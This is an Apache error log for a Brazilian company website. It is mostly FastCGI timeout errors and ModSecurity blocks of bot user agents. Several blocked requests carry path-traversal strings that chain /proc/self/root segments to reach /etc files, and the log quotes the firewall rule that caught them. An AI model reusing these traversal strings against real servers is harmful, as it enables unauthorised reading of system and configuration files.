[Thu Mar 19 16:58:41.201943 2026] [proxy_fcgi:error] [pid 20435:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:44630] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:59:02.296268 2026] [proxy_fcgi:error] [pid 8307:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:44822] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:59:10.809589 2026] [:error] [pid 8307:tid 140411574073088] [client 74.7.228.61:36808] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxVjr-FhjpZGs9ba8qR5AAAAxQ"]
[Thu Mar 19 16:59:23.074649 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:45120] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:59:50.486621 2026] [proxy_fcgi:error] [pid 21563:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:45368] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:00:12.125932 2026] [proxy_fcgi:error] [pid 8307:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:45604] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:00:36.472800 2026] [proxy_fcgi:error] [pid 8307:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45880] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:01:11.261631 2026] [core:alert] [pid 21563:tid 140411590858496] [client 57.141.18.52:43160] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 17:01:20.233789 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45982] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:01:44.166555 2026] [:error] [pid 19655:tid 140411674785536] [client 74.7.243.128:49172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxWKE1ujooLWdUDGy77LgAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 17:01:47.064175 2026] [:error] [pid 5816:tid 140411548894976] [client 74.7.244.43:39584] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxWKZfmNfuxceSuAEK9CAAAAdc"]
[Thu Mar 19 17:01:54.273931 2026] [proxy_fcgi:error] [pid 19655:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:46020] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:02:21.145786 2026] [proxy_fcgi:error] [pid 27293:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:46534] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:02:45.548944 2026] [proxy_fcgi:error] [pid 27293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:47186] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:03:07.121843 2026] [proxy_fcgi:error] [pid 5816:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:47614] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:03:28.064391 2026] [proxy_fcgi:error] [pid 7235:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:47832] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:03:49.697946 2026] [proxy_fcgi:error] [pid 20435:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:48060] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:03:50.278971 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:53718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxWpuoXxyEfFpUF8f80mAAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 17:04:15.925848 2026] [proxy_fcgi:error] [pid 8307:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:48228] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:04:51.293826 2026] [proxy_fcgi:error] [pid 21563:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:48390] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:04:53.320430 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.228.61:58806] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxW5QbLMZ6AikZjR9WDcwAAAAU"]
[Thu Mar 19 17:05:10.516361 2026] [:error] [pid 19655:tid 140411666392832] [client 162.142.125.222:45690] [client 162.142.125.222] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "CensysInspect" at REQUEST_HEADERS:User-Agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxW9k1ujooLWdUDGy77aAAAAEk"]
[Thu Mar 19 17:05:28.425810 2026] [proxy_fcgi:error] [pid 7545:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:48616] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:05:58.288914 2026] [proxy_fcgi:error] [pid 8307:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:48788] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:06:20.177986 2026] [proxy_fcgi:error] [pid 7893:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49074] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:06:47.174287 2026] [proxy_fcgi:error] [pid 7545:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49516] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:07:08.437787 2026] [proxy_fcgi:error] [pid 19655:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:49676] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:07:30.127808 2026] [proxy_fcgi:error] [pid 8307:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:49892] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:07:52.061829 2026] [proxy_fcgi:error] [pid 8307:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49980] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:08:13.133872 2026] [proxy_fcgi:error] [pid 5816:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:50036] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:08:35.689808 2026] [proxy_fcgi:error] [pid 30077:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:50086] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:08:57.066659 2026] [proxy_fcgi:error] [pid 20435:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:50242] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:09:23.884949 2026] [proxy_fcgi:error] [pid 15826:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:50284] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:09:51.405849 2026] [proxy_fcgi:error] [pid 21563:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:50336] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:10:13.129803 2026] [proxy_fcgi:error] [pid 17887:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:50572] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:10:36.653886 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:50628] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:10:46.729058 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.228.61:40106] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxYRgkwaGbbGflqUZDzEAAAAMc"]
[Thu Mar 19 17:11:01.208806 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50742] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:11:24.973802 2026] [proxy_fcgi:error] [pid 7893:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:50894] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:12:24.837410 2026] [:error] [pid 21563:tid 140411716749056] [client 74.7.243.128:36938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxYqEpm7ZmxKZTM4bZs0AAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 17:12:27.780585 2026] [:error] [pid 21563:tid 140411582465792] [client 74.7.244.43:51658] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxYq0pm7ZmxKZTM4bZs2AAAA5M"]
[Thu Mar 19 17:12:30.237051 2026] [proxy_fcgi:error] [pid 8307:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:50970] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:12:55.256039 2026] [proxy_fcgi:error] [pid 7893:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:51160] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:13:35.806629 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:51352] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:13:58.426261 2026] [proxy_fcgi:error] [pid 14269:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51526] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:14:25.011958 2026] [proxy_fcgi:error] [pid 7235:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:51618] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:14:56.873448 2026] [proxy_fcgi:error] [pid 21563:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51710] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:15:26.815144 2026] [proxy_fcgi:error] [pid 17887:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51804] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:16:01.230948 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:51954] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:16:23.229809 2026] [proxy_fcgi:error] [pid 7545:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52192] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:16:44.046041 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52500] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:16:59.577815 2026] [:error] [pid 19655:tid 140411741927168] [client 74.7.228.61:41608] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxZu01ujooLWdUDGy77fgAAAEA"]
[Thu Mar 19 17:17:05.121818 2026] [proxy_fcgi:error] [pid 8307:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:52664] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:17:26.653886 2026] [proxy_fcgi:error] [pid 21563:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52758] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:18:16.272232 2026] [:error] [pid 20435:tid 140411741927168] [client 74.7.244.43:57308] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxaCJJaM1-0uhhUQJNALgAAAIA"]
[Thu Mar 19 17:18:35.917801 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:52860] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:19:05.141778 2026] [proxy_fcgi:error] [pid 14269:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:53302] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:19:26.645821 2026] [proxy_fcgi:error] [pid 17887:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:53432] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:19:53.121859 2026] [proxy_fcgi:error] [pid 7893:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:53634] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:20:14.046016 2026] [proxy_fcgi:error] [pid 15826:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53800] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:20:44.646211 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:54008] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:21:44.121969 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54110] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:22:05.229799 2026] [proxy_fcgi:error] [pid 8307:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54440] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:22:17.091249 2026] [:error] [pid 8307:tid 140411624429312] [client 74.7.228.61:35984] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxa-b-FhjpZGs9ba8qSNgAAAw4"]
[Thu Mar 19 17:22:26.126150 2026] [proxy_fcgi:error] [pid 7893:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55022] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:22:47.128986 2026] [proxy_fcgi:error] [pid 17653:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55326] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:23:01.975714 2026] [:error] [pid 20435:tid 140411674785536] [client 74.7.228.61:36716] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxbJZJaM1-0uhhUQJNAvgAAAIg"]
[Thu Mar 19 17:23:08.798614 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55612] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:23:39.601498 2026] [:error] [pid 8307:tid 140411624429312] [client 74.7.243.128:60428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxbS7-FhjpZGs9ba8qSygAAAw4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 17:23:42.231114 2026] [:error] [pid 8307:tid 140411624429312] [client 74.7.244.43:35444] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxbTr-FhjpZGs9ba8qSzgAAAw4"]
[Thu Mar 19 17:23:55.137789 2026] [proxy_fcgi:error] [pid 7893:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:55748] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:24:17.116047 2026] [proxy_fcgi:error] [pid 7893:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56584] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:24:39.469808 2026] [proxy_fcgi:error] [pid 19655:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56972] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:25:24.794166 2026] [proxy_fcgi:error] [pid 27293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:57182] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:25:47.325900 2026] [proxy_fcgi:error] [pid 7893:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:57482] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:26:41.729838 2026] [proxy_fcgi:error] [pid 21219:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:57536] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:27:07.584371 2026] [proxy_fcgi:error] [pid 27293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58124] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:27:29.821912 2026] [proxy_fcgi:error] [pid 20435:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:58626] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:27:57.183203 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:59196] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:28:11.335771 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.228.61:46238] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxcW-oXxyEfFpUF8f81LAAAAUE"]
[Thu Mar 19 17:28:18.347497 2026] [proxy_fcgi:error] [pid 21219:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:59462] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:28:40.097881 2026] [proxy_fcgi:error] [pid 27293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:59752] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:29:01.939483 2026] [proxy_fcgi:error] [pid 7893:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:59860] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:29:39.585785 2026] [proxy_fcgi:error] [pid 19655:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:59906] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:29:40.004341 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.244.43:33444] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxctOoXxyEfFpUF8f81hAAAAUE"]
[Thu Mar 19 17:30:01.109864 2026] [proxy_fcgi:error] [pid 7545:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60168] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:30:44.562394 2026] [proxy_fcgi:error] [pid 7235:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:60378] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:31:06.121778 2026] [proxy_fcgi:error] [pid 21219:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60642] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:31:34.245094 2026] [mime_magic:error] [pid 5816:tid 140411658000128] (70014)End of file found: [client 57.141.18.30:59588] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 17:32:07.653841 2026] [proxy_fcgi:error] [pid 27293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60732] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:32:29.127099 2026] [proxy_fcgi:error] [pid 27293:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:33050] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:32:51.965326 2026] [proxy_fcgi:error] [pid 30077:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:33194] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:33:13.133787 2026] [proxy_fcgi:error] [pid 21219:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33552] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:33:35.033894 2026] [proxy_fcgi:error] [pid 30077:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:33820] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:33:56.129826 2026] [proxy_fcgi:error] [pid 27293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:34160] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:34:19.547222 2026] [proxy_fcgi:error] [pid 8307:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:34426] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:34:43.209357 2026] [proxy_fcgi:error] [pid 21563:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:34682] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:35:05.206518 2026] [proxy_fcgi:error] [pid 19655:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:34886] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:35:32.125822 2026] [proxy_fcgi:error] [pid 21219:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35346] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:35:55.597798 2026] [proxy_fcgi:error] [pid 17887:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:35996] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:36:17.921917 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:36512] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:37:07.771480 2026] [proxy_fcgi:error] [pid 27293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36786] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:37:44.481961 2026] [proxy_fcgi:error] [pid 27293:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:37052] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:38:18.245822 2026] [proxy_fcgi:error] [pid 21219:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:37202] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 17:38:48.329536 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:37286] AH01075: Error dispatching request to : (polling)
